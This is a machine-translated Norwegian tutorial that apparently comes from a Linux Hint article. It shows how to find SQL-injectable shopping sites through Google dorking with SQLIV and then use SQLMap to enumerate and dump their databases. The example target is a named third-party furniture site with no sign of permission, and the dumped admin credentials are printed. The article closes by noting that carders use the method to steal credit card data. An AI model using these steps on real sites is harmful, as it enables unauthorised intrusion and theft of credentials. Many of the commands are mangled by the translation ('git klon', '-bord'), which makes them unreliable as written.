Men ved siden av lettheten og funksjonene som databasen tilbyr, så vel som de mange bruksområdene til databaser i verden av informasjon og teknologi, spesielt i utviklingen av et nettsted. Uavhørende pentestere og hackere prøver å finne et gap i databasens sikkerhet. Dette bekreftes av rapporten utstedt av Positive Technologies-forskere, informasjonssikkerhetsforskningssentre i Europa, i andre kvartal 2017 ble de 10 beste angrepene på webapplikasjonen dominert av krysset på tvers av nettsteder på 39.1% og SQL -injeksjon av 24.9%. Positive Technologies sa at rapporten i andre kvartal ikke er mye forskjellig fra første kvartal.
Figur 1. Topp 10 webapplikasjonsangrep (Source PTSecurity.com)
Dette er både interessant og bekymringsfullt, for i en database er det mye informasjon som legitimasjonskontoer (admin og bruker), informasjonsdetaljer for økonomisk informasjon (for eksempel kredittkort, bankkontoer osv.) og så videre. For å gjøre SQL -injeksjonsangrep krever ikke alltid ekspertinjeksjonsevner, i den forstand kan barna gjøre det. Fordi det er mange gratis applikasjoner som er i stand til å utføre SQL -injeksjon automatisk, for eksempel SQLMap. SQLMap er en åpen kildekode -applikasjon for penetrasjonstestingsaktiviteter som tar sikte på å utføre SQL -injeksjonsangrep i et databasesikkerhetshull automatisk. Her vil jeg vise deg hvordan du gjør SQL -injeksjon ved hjelp av SQLMap i Linux Kali. Ingen spesielle muligheter er nødvendige, men vil være mer verdt hvis du mestrer et skriptspråk eller SQL -databaseteknologi.
Denne opplæringen anbefales for de som er nye i SQL -injeksjon i Kali Linux, bare for moro skyld, eller som vil se hvordan SQL -injeksjon fungerer. Det anbefales ikke at de allerede er dyktige penetrasjonstestere.
Hei, jeg er Bimando, forfatteren av denne artikkelen. Hvis du liker denne artikkelen, kan du se på å kjøpe boken min PRAKTISK ETISK HACKING: For penetrasjonstestere med Kali Linux. Jeg jobbet hardt med det med Linux -hint -teamet for å produsere et produkt av høy kvalitet. Jeg vet at du vil elske det og lære mye.
SQL -injeksjon ved hjelp av SQLMap i Kali Linux
Før vi gjør injeksjonsangrepet, må vi selvfølgelig sørge for at serveren eller målet har et databasesikkerhetshull. For å finne databasesikkerhetshull, er det flere metoder vi kan bruke. Blant dem, Google Dorking, brukes mest av hacker og penetrasjonstestere. Heldigvis er det et verktøy som er i stand til å gjøre det automatisk. Men vi må installere verktøyet først. Verktøyet kalles SQLIV (SQL Injection Sårbarhetsskanner).
Trinn 1: Installer SQLIV på Kali Linux
Skriv kommandoer nedenfor i terminalen din for å installere SQLIV:
~# git klon https: // github.com/hadesy2k/sqliv.git
~# CD Sqliv && sudo python2 oppsett.py -i
Når SQLIV er installert i Kali Linux, lagres den i banen /usr/bin/sqliv. Som du kan ringe direkte fra terminalen, ved å skrive 'Sqliv'. La oss nå se på SQLIV -funksjoner.
Trinn 2: Finne SQL -injeksjonssårbarheter
Vi vil bruke Google Dorking for å skanne og finne SQL -injeksjonshullet i mål. La oss ta en enkel dork, og la SQLIV skanne gjennom hvert eneste mål og se etter et netthandel -sårbarhet ved følgende URL -mønster '.PHP?id = '. For å finne andre mønstre bare Google for “Google Dork List”.
~# sqliv -d inurl: vare.PHP?id = -e google -p 100
Som standard vil SQLIV krype første side på søkemotoren, som på Google 10 nettsteder per side. Dermed definerer vi argument -p 100 å krype 10 sider (100 nettsteder). Basert på dork gitt ovenfor fikk vi et resultat av sårbare nettadresser som ser slik ut:
Vi fant åtte av hundre nettadresser skannet og ansett som sårbare mot SQL -injeksjonsangrep. Lagre nettadressene i tekstredigerer for ytterligere trinn.
Trinn 3: SQL -injeksjon ved hjelp av SQLMap
Når vi fikk minst ett SQL -injeksjon sårbart mål, utfører vi deretter angrepet ved hjelp av SQLMap. Jeg tar en av dem for å være et utvalg her. For det første må vi avsløre databasenavnet, inne i databasen har tabeller og kolonner, som inneholder dataene.
Target URL: http: // www.Acfurniture.com/vare.PHP?ID = 25
Kommandomønster:
~# SqlMap -u “Target URL” -DBS
-U / --URL: Target URL
--DBS: tellere database/s navn
Så kommandoen som er samlet ville se slik ut:
~# sqlmap -u “http: // www.Acfurniture.com/vare.PHP?Id = 25 ” -DBS
Fra kommandoen over, bør resultatet se slik ut
Vi fikk databasenavnet "Acfurniture”.
Kommandomønster:
~# SQLMAP -U “Target URL” -D Database -Name -Tables
Så kommandoen samlet være slik:
~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -bord
Resultatet skal se slik ut:
Så langt kan vi konkludere med at ordningen med data er, nettstedet Acfurniture.com har to databaser, Acfurniture og informasjon_schema. Databasen som heter Acfurniture inneholder fire bord: kategori, produkt, produkt_hakket, og Innstillinger. Det er ikke noe kompromittert bordnavn, men la oss undersøke mer. La se hva som er inni Innstillinger bord. Inne i tabellen er det faktisk kolonner, og dataene.
Kommandomønster:
~# SqlMap -u “Target URL” -D Database -Name -t Tabell -Name -Kolonner
Så kommandoen samlet være slik:
~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -t innstillinger -kolonner
Utgangen skal se slik ut:
De Innstillinger Tabellen består av 6 kolonner, Og dette er faktisk en legitimasjonskonto. La oss dumpe disse dataene.
Kommandomønster:
~# SQLMAP -U “Target URL” -D Database -Name -T Tabell -Name -C Columns -Dump
Så kommandoen samlet være slik:
~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -t innstillinger -c brukernavn, passord -dump
Eller du kan også dumpe alle data inne i tabellen ved å bruke kommando:
~# sqlmap -u "http: // www.Acfurniture.com/vare.PHP?id = 25 "-d acfurniture -t innstillinger --dump
Utgangen skal se slik ut:
E -post : [email protected]
Brukernavn : Kjekk
Passord : 9hpko2nkrhbgmywzizxui
OK, vi er ferdig med å dumpe data i databasen ved hjelp av SQL -injeksjon. Våre neste oppgaver er å finne dør eller adminpanel, administratorpåloggingsside på målsider. Før du gjør det, må du sørge for at passordet (9HPKO2NKRHBGMYWZIZXUI) er kryptert eller ikke, i så fall, så må vi dekryptere det først. Det er et annet tema, sprekker og dekrypterende.
Selv her har vi faktisk ikke hacking inn på målstedet, i det minste har vi lært mye om SQL -injeksjon ved hjelp av SQLMap i Kali Linux enkelt, og vi dumper legitimasjonskontoen. Denne teknikken brukes mest av Carder (Hacker som leter etter kredittkortkonto på e-handelsnettsteder) som retter seg mot økonomiske, bank-, butikk- eller e-handelsnettsteder som lagrer brukerkredittkortinformasjonen sin.